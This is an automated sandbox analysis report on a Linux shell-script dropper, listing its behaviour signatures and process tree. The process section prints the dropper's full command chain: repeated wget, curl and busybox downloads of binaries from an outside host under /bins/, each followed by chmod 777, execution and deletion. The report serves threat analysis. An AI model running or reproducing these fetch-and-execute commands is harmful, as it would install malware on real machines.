Analysis Overview
SHA256
38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764
Threat Level: Shows suspicious behavior
The file 38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-25 01:24
Signatures
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-25 01:24
Reported
2024-10-25 01:27
Platform
debian9-mipsel-20240418-en
Max time kernel
85s
Max time network
86s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | N/A |
| N/A | /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | N/A |
| N/A | /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | N/A |
| N/A | /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 | /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 | N/A |
| N/A | /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf | /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf | N/A |
| N/A | /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk | /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk | N/A |
| N/A | /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh | /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh | N/A |
| N/A | /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC | /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC | N/A |
| N/A | /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR | /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR | N/A |
| N/A | /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx | /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx | N/A |
| N/A | /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | N/A |
| N/A | /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | N/A |
| N/A | /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | N/A |
| N/A | /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | N/A |
| N/A | /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | N/A |
| N/A | /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | N/A |
| N/A | /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | N/A |
| N/A | /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | N/A |
| N/A | /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | N/A |
| N/A | /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | N/A |
| N/A | /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | N/A |
| N/A | /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 | /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 | N/A |
| N/A | /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf | /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf | N/A |
| N/A | /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk | /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk | N/A |
| N/A | /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh | /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh | N/A |
| N/A | /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC | /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC | N/A |
| N/A | /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR | /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR | N/A |
| N/A | /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx | /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | /usr/bin/curl | N/A |
| File opened for modification | /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf | /usr/bin/curl | N/A |
Processes
/tmp/38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh
[/tmp/38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/bin/chmod
[chmod 777 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ
[./wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/bin/rm
[rm wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/bin/chmod
[chmod 777 pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z
[./pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/bin/rm
[rm pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/bin/chmod
[chmod 777 VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI
[./VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/bin/rm
[rm VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/bin/chmod
[chmod 777 ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0
[./ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/bin/rm
[rm ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/bin/chmod
[chmod 777 bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf
[./bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/bin/rm
[rm bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/bin/chmod
[chmod 777 TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk
[./TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/bin/rm
[rm TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/bin/chmod
[chmod 777 KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh
[./KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/bin/rm
[rm KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/bin/chmod
[chmod 777 zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC
[./zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/bin/rm
[rm zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/bin/chmod
[chmod 777 Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR
[./Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/bin/rm
[rm Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/bin/chmod
[chmod 777 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx
[./9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/bin/rm
[rm 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/bin/chmod
[chmod 777 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu
[./8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/bin/rm
[rm 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/bin/chmod
[chmod 777 cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY
[./cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/bin/rm
[rm cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/bin/chmod
[chmod 777 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959
[./4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/bin/rm
[rm 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/bin/chmod
[chmod 777 res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR
[./res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/bin/rm
[rm res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/bin/chmod
[chmod 777 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu
[./8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/bin/rm
[rm 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/bin/chmod
[chmod 777 cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY
[./cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/bin/rm
[rm cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/bin/chmod
[chmod 777 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959
[./4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/bin/rm
[rm 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/bin/chmod
[chmod 777 res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR
[./res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/bin/rm
[rm res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/bin/chmod
[chmod 777 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ
[./wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/bin/rm
[rm wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/usr/bin/wget
